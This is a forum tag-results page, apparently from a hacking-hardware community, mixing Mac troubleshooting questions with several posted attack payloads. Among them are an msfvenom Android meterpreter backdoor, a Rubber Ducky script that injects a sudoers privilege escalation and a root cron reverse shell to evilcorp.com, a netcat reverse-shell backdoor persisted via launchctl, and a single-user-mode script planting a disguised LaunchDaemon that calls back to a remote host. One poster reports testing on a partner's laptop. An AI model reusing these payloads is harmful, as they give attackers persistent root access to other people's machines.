Search the Community
Showing results for tags 'osx'.
-
I just create sample for android backdoor it's call apkgue.apk, after I run on my phone (android) I stuck to the next step.. the meterpreter > doesn't show.. why? any help for me? thanks.. msf > ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk [*] exec: ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk No platform was selected, choosing Msf::Module::Platform::Android from the payload No Arch selected, selecting Arch: dalvik from the payload No encoder or badchars specified, outputting raw payload Payload size: 8809 bytes msf > use exploit/multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp payload => android/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.43.128 lhost => 192.168.43.128 msf exploit(handler) > set lport 3344 lport => 3344 msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (android/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.43.128 yes The listen address LPORT 3344 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit [*] Exploit running as background job 0. [*] Started reverse TCP handler on 192.168.43.128:3344 msf exploit(handler) > [*] Sending stage (69089 bytes) to 192.168.43.1 [*] Meterpreter session 1 opened (192.168.43.128:3344 -> 192.168.43.1:44411) at 2017-10-19 23:02:02 +0700
-
Hi guys, I'm new here and need a bit of help regarding special characters along with the de.properties language file. My Ducky code requires the > sign (greater than), however by using the -l de.properties parameter my Rubber Ducky always writes a degree sign ° instead of >. In the properties file there is the following entry which should be fine: ASCII_3E = KEY_NON_US_100, MODIFIERKEY_SHIFT // 62 > On Windows this is working well, and that's why I'm thinking the properties file is correct. However, I need to get this work on my Mac as well. Do you have any tips? Thanks, David
-
Hi, My MacBook Pro cannot find my newly bought Nano in the wp6.sh script, can anyone pls tell me why? It just keeps searching (.........) and never shows that it finds the device. If i do the same on a Linux machine it works fine. I can easily log in to the web interface on http://172.16.42.1:1471 Subsequent sessions may be quickly connected using saved settings. [C]onnect using saved settings [G]uided setup (recommended) [M]anual setup [A]dvanced IP settings [Q]uit Step 1 of 3: Select Default Gateway Default gateway reported as 192.168.0.1 Use the above reported default gateway? [Y/n]? Y Step 2 of 3: Select Internet Interface Internet interface reported as en0 Use the above reported Internet interface? [Y/n]? Y Step 3 of 3: Select WiFi Pineapple Interface Please connect the WiFi Pineapple to this computer. ................................................... ...................................................
-
I found a script for ducky, that looked pretty cool, and also a thing I wanted to try. So I changed the details, for what I needed. To test how if it worked right (just if the text was right) I encoded it to open TextEdit instead of Terminal, now I got my inject.bin and plugged in my ducky. It opens TextEdit and types it in, BUT... for some reason it changes all > to § and < to $ it also changes ' to ’. I'm guessing it's because of the keyboard language but I'm using Danish keyboard and also encode it with Danish?? Sorry if bad English, and thx for any help and info given! -
I am trying to launch Kali Linux on my Macbook Pro and when I launch it using refind I get this error: "No bootable device -- Insert boot disk and press any key." My USB is working fine on other Macbooks, even older than mine. MPR Specifications: Macbook Pro 13" Early 2011 i5, 4 RAM Model Identifier: MacBookPro8,1 Hardware UUID: 1BC47169-1046-5052-B58F-F736330B7B6
-
Step One : unpacked my Pineapple Nano Setup Two : Connected to my MacBook Air Initial setup screen says "Please ensure that the WiFi Pineapple is powered according to documentation for a successful firmware flash." Can anyone please point me to the 'Documentation' so that I can start with an RTFM [hoping to avoid a list of dumb questions]? Also - the Download section for Nano Firmware flash only includes Android Linux Windows so If I don't want to use my Macbook Air [forums seem to indicate it's more complicated - and I may not want to mess up my work laptop] does anyone have a recommendation between Android, Linux or Windows for a machine to use with my Pineapple Nano ? Should I figure out how to build a Kali Linux laptop ? [that would bee an other month long learning curve right ???]
-
I can't even seem to connect to my new Nano there is no response on http://172.16.42.1:1471 I plug it in - it boots - blue light blinks - then goes solid ... My read of Ifconfig shows Nano is connected to en5 - but seems en5 has no IP address ??? Ifconfig output is below - and screen show is attached ... I'm stuck !!! Any ideas ? Is there a way to Hard Reset ?? ------------------------------------- en5: flags=8963<UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX,MULTICAST> mtu 1500 options=4<VLAN_MTU> ether 00:c0:ca:8f:b6:11 inet6 fe80::2c0:caff:fe8f:b611%en5 prefixlen 64 scopeid 0xa nd6 options=1<PERFORMNUD> media: autoselect (100baseTX <full-duplex,flow-control>) status: active bridge100: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500 options=3<RXCSUM,TXCSUM> ether 9a:e0:d9:79:10:64 inet 192.168.2.1 netmask 0xffffff00 broadcast 192.168.2.255 inet6 fe80::98e0:d9ff:fe79:1064%bridge100 prefixlen 64 scopeid 0xb Configuration: id 0:0:0:0:0:0 priority 0 hellotime 0 fwddelay 0 maxage 0 holdcnt 0 proto stp maxaddr 100 timeout 1200 root id 0:0:0:0:0:0 priority 0 ifcost 0 port 0 ipfilter disabled flags 0x2 member: en5 flags=3<LEARNING,DISCOVER> ifmaxaddr 0 port 10 priority 0 path cost 0 nd6 options=1<PERFORMNUD> media: autoselect status: active pineapple-setup-stuck.pdf
-
Hi all, I'm looking at making a script on a CD-ROM, that will; recognise the operating system of the machine it has been inserted in to run a specific script for that operating system Is there a cross-platform script/code language that would be recognised by both Windows and OSX, as a standard build? I understand that Python, for example, could run on both, however this would require the user to have installed it. Is there a language that both OSX and Windows would recognise straight-out-of-the-box? I tried a few internet searches, but everything I find pretty much states you have to download additional files to the PC (e.g; installing Python), which is no good. Thank you. -
Hi, Looking for some help, total noob here. I've searched the forum and can't find any answers or similar problems to mine (i'm sure it's a simple noob error). Basically I've tried two different payloads, a simple "hello world" and a wall paper change. Both have the same issue which ends up with the desktop icons being re-named to the actual code that is in the text file / payload, whilst the payload is executing. As far as i'm aware the inject file is compiled correctly, and placed at the root of the ducky micro SD. I've also watched and followed the: Ducky quack start guideWith no luck. Any help or advice would be greatly appreciated (trying different delays right now). Cheers
-
[Payload] [Mac OS X] Simple persistent reverse bash
Matto posted a topic in Classic USB Rubber Ducky
Hi! I'm new to the Rubber Ducky and to this community. I've made a simple payload to create a reverse bash in an OS X target by using crontab. I've seen some examples that use complicated generated plist files, and I'm not sure about what the advantage is over setting a cron to recover the session. Anyway, this is my payload: DELAY 2000 REM --------------- OPEN TERMINAL IN A NEW WINDOW --------------- COMMAND SPACE DELAY 300 STRING Terminal DELAY 300 ENTER DELAY 700 COMMAND n DELAY 500 REM --------------- ESCALATE PRIVILEGES --------------- STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s ENTER DELAY 200 REM --------------- RUN PAYLOAD --------------- STRING (crontab -l ; echo "* * * * * bash -i >& /dev/tcp/evilcorp.com/443 0>&1")| crontab - ENTER DELAY 200 REM --------------- SET PRIVILEGES BACK TO NORMAL --------------- STRING echo -e '$d\nw\nq'| ed /etc/sudoers ENTER DELAY 200 REM --------------- CLOSE TERMINAL --------------- STRING exit ENTER COMMAND Q What this does is: Open the terminal Magically grant sudo privileges (many thanks to V3sth4cks153 for this) Add a line to the root crontab to execute the reverse bash script every minute (replace «evilcorp.com» with your host / IP) Remove the newly added privileges to the current user in /etc/sudoers Close the terminal app The whole execution takes around 5 seconds. So now, all we have to do in our attacking machine is: sudo nc -l -p 443 We wait one minute (max) and we're in with root privileges Since the script is in root's crontab, we will always have root privileges, and if we close the connection, we can always re-take it. Another advantage is that by using port 443, the victim machine will not be blocked by any firewall. You can change the port to whatever you want. I just tested it on my girlfriend's Macbook Air and it works flawlessly. One thing that bothers me (remember, I'm new) is that some keys like the arrows don't work, so when I want to edit a file using vi, or something like that, I can't. Maybe you guys can point me to some solution to this? Same happens when I want to get files from the victim using FTP or SCP. When it's supposed to ask for my password, the connection stops responding and I have to re-connect. Hope you like it! -
I've flashed the cm_duck.hex firmware on my USB Rubber Ducky and I cannot get inject.bin or inject2.bin to execute on my Macbook (it works fine on a Windows computer). I've ensured that the caps lock light is on, and also tried pressing the button on the USB. The default duck.hex and c_duck_v2_S001.hex works (S001 requires pressing of button on USB) on my Macbook. Is OS X not supported by the cm_duck.hex firmware? Or am I doing anything wrong? Any help will be greatly appreciated
-
[MACOSX] [EFI] Anyone have payload for efi password?
emZe posted a topic in Classic USB Rubber Ducky
Hi all, i bought a rubber ducky recently for bypass the EFI password like Teensy 3 https://www.youtube.com/watch?v=xXMiX-Bybsw But when typing the password, just type 1 ore 2 dot in the password case and after type enter, sometimes make nothing... anyone know the issue for that? Thanks in advance. Sorry for my bad english because i'm from belgium... -
Hello, I just ordered and received my first Rubber Ducky in the mail. Let me just say that I think it's an incredible piece of equipment. I do however have one problem. I wrote my first Payload in TextEdit, correctly encoded it (via Terminal) onto the MicroSD, and then loaded it into the Rubber Ducky. When I insert the Rubber Ducky into my USB slot, the commands are being carried out; but the GUI command is not cooperating with my Mac OSX. Here is my code: GUI SPACE is intended to execute COMMAND SPACE on my Mac OSX. The rest of the code just does random stuff with finder because the first command didn't work. To fix this problem I think I need to update the Firmware? To update the firmware I believe I need to flash the Ducky... But I haven't been able to do this using dfu-programmer-0.5.4 I have follow this tutorial: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Flashing-ducky According to the README file on dfu-programming-0.5.4 I am supposed to "./configure", "make", and "make install" before I can flash the Ducky(From my understanding). I am able to configure the file, but when I type "make" / "make install" I get the error message "Fatal Error: usb.h not found". I have tried everything to get around this. If someone could please help me update the Firmware on my Rubber Ducky, or tell me what I am doing wrong I would greatly appreciate it.
-
Can i use Ducky to install file on mac and run it when flash drive is plugged in.
-
Hi everyone. I couldn't think of a better way to make a first post than to contribute some content. Here is a very very basic reverse shell ducky script that works on OS X. I've found the OS X payloads to be few and far between and I plan on posting many more of them here. Post yours too! I changed some stuff to be a little more verbose / easy to follow. Hope you enjoy (it's shockingly simple) REM title: osx reverse shell - execute in background - minimize terminal - run on startup DELAY 500 GUI SPACE DELAY 300 STRING terminal ENTER DELAY 600 STRING touch script.sh ENTER STRING echo "mkfifo foo" > script.sh ENTER STRING echo "nc 192.168.1.19 4444 <foo | /bin/bash 1>foo" >> script.sh ENTER STRING chmod +rwx script.sh ENTER STRING launchctl submit -l someName -p ~/script.sh ENTER STRING ./script.sh& ENTER STRING clear ENTER GUI m This simply creates a script with a netcat command that routes a command prompt to the host (192.168.1.19) on port 4444. It adds this script to the launch daemon so that it acts as a backdoor. Note however that because of the way the script is written, it will connect back on login, and not continuously attempt to connect back. It then runs it in background, clears the screen and minimizes. Enjoy, I will be posting more advanced payloads soon! -Shark3y -
Hi, I have a bit of a newbie question so thanks in advance for any replies. I have just ordered my first pineapple. Will the mark V automatically connect to a Mac OSX via ethernet? I'm not talking about sharing an internet connection at this point, but just accessing the pineapples web interface? I cannot find any information online. Even the Wiki page related to this in empty: http://wiki.wifipineapple.com/index.php/OSX_ICS Thanks.
-
Hi guys ! I've just received my Rubber Ducky. I successfully managed to upgrade the firmware to the Duck 2.1 and change my VID/PID to skip the keyboard setup assistant on a mac. I've tried to use the osx user backdoor (reverse shell) payload, encode it with duck toolkit online and select "Français MAC" as language (i'm working on an azerty macbook pro). Everything seems to be okay (no azerty/qwerty problem), except one thing : the ~ character does not print. Somebody does have an idea?
-
Okay so i am going to get the MSI GT60 0NF-612US laptop an i wanted to know if i could run OSX in virtual box on it...... I am only asking because when i tried it on my dell inspiron 1545 it said that i had the wrong processor or something so idk if it would work in laptop im going to get or not.... Does any one actually know why it didnt work? And will it work with this processor? Windows 7 Professional/ Intel Core i7-3630QM Processor I really just want to have the best of both worlds mac when i need it and windows when i dont!!!! Any help would be apriciated! -Thanks
-
Hello again I made another payload for mac osx. This one will print any file from the internet (You can delet the "curl -o" command to print a local file). I you dont want it to delete the printed file, just remove the "-r". But other wise you only have to replace the bracets() and whats inside of them with your configuration. Please reply, doesn't matter what you say. I just want to see if I am wasting my time about something that no one cares about. DELAY 2000 GUI SPACE DELAY 500 STRING Terminal DELAY 1000 ENTER DELAY 1000 curl -O (here put a link to a photo of file to download or delete the command to print a local file ex. trollface.com/troll.jpg) ENTER DELAY 2000 (change this delay to adjust your internet download speed/the file size) STRING lpr -P (here put the name of the printer ex. Hp-officejet) -# (here put the number of copies) -r (here navigate to the photo or file. Its in your home folder or home directory. ex. /home/jake/photo) ENTER DELAY 3000 Command-Q
-
Linux Depending on your architecture it should be available within your package-manager, maybe me should pad this out in following posts below? As of Kali 1.0.5 it should be installed by default. http://www.kali.org/news/kali-linux-software-defined-radio-support/ OSX Either download the software from this website GQRX or if you have macports: port install gqrx Mac ports is preferred is it will install all necessary dependancies! like: gnuradio and gr-osmosdr (drivers for RTLSDR) It should then appear within Applications! Very point and click orientated - very easy to use. EDIT: You can also use brew instead of macports; but I'm more familiar with macports! -
Hi ! I know that you can already find a small number of payloads on Github, but there are many more that have been created by the community. For example, we found none for Android on GitHub. And, I have experienced the difficulty to find exactly what I need ;) That's why I think it would be a good initiative to gather as much as possible payloads on this topic. If you have created an effective and fun on, or if you use regularly one made by another member, why not post it below to share it ? (select those who are not already on GitHub for the moment please) If you are interested, try to complete a short form of this type and post it below. Title : Author : Target : Description : Obviously, if it does not seem to be a good idea, let me know -_-
-
Hey everyone! I wrote a quick and dirty script that'll root Macs from single user mode. There are practically no defenses to this besides full disk encryption. I challenge you to try it out if you have free time. You won't be disappointed. Grab the payload here. Also, I wrote a quick tutorial that describes the ins and outs of the attack here. (site is new and heavily under construction lol) REM Patrick Mosca REM A simple script for rooting OSX from single user mode. REM Change mysite.com to your domain name or IP address REM Change 1337 to your port number REM Catch the shell with 'nc -l -p 1337' REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/ DELAY 1000 STRING mount -uw / ENTER DELAY 2000 STRING mkdir /Library/.hidden ENTER DELAY 200 STRING echo '#!/bin/bash ENTER STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1 ENTER STRING wait' > /Library/.hidden/connect.sh ENTER DELAY 500 STRING chmod +x /Library/.hidden/connect.sh ENTER DELAY 200 STRING mkdir /Library/LaunchDaemons ENTER DELAY 200 STRING echo '<plist version="1.0"> ENTER STRING <dict> ENTER STRING <key>Label</key> ENTER STRING <string>com.apples.services</string> ENTER STRING <key>ProgramArguments</key> ENTER STRING <array> ENTER STRING <string>/bin/sh</string> ENTER STRING <string>/Library/.hidden/connect.sh</string> ENTER STRING </array> ENTER STRING <key>RunAtLoad</key> ENTER STRING <true/> ENTER STRING <key>StartInterval</key> ENTER STRING <integer>60</integer> ENTER STRING <key>AbandonProcessGroup</key> ENTER STRING <true/> ENTER STRING </dict> ENTER STRING </plist>' > /Library/LaunchDaemons/com.apples.services.plist ENTER DELAY 500 STRING chmod 600 /Library/LaunchDaemons/com.apples.services.plist ENTER DELAY 200 STRING launchctl load /Library/LaunchDaemons/com.apples.services.plist ENTER DELAY 1000 STRING shutdown -h now ENTER
-
Hi all, Just got my first USB Rubber Ducky and decided to write a payload to prank some friends. REM Title: OSX background changer REM This payload will open terminal, download an image to the default desktop REM pictures directory, set it as the background then kill the dock to REM refresh the background. It also closes the terminal window. DELAY 3000 GUI SPACE STRING terminal DELAY 200 ENTER DELAY 200 STRING cd /Library/Desktop\ Pictures DELAY 200 ENTER STRING curl -s -O http://YOUR_URL_HERE/1.jpg ENTER DELAY 2000 STRING defaults write com.apple.desktop Background '{default = {ImageFilePath = "/Library/Desktop Pictures/1.jpg";};}' ENTER DELAY 200 STRING killall Dock ENTER STRING killall Terminal ENTER Be sure to put in a valid URL of the image you want to set as the background. This works best if you're using the latest firmware with the vidpid.bin file set to 05ac 0202. It's my first payload, so if you see anything the matter, please let me know. L
-
Has there been any progress getting internet sharing to work with OSX and Pineapple using Fusion? I hate having to use a separate laptop just for the Pineapple. I've created the second adapter for the vm, set it to ethernet, etc...Fusion then assigns its own IP vice using the 172...... Any ideas?
-
How can I trigger the OPTION key on OSX? I am trying to use keyboard shortcuts to open finder, search for terminal, and then open it. I want to minimize all windows using COMMAND-OPTION-M and then launch finder with COMMAND-F
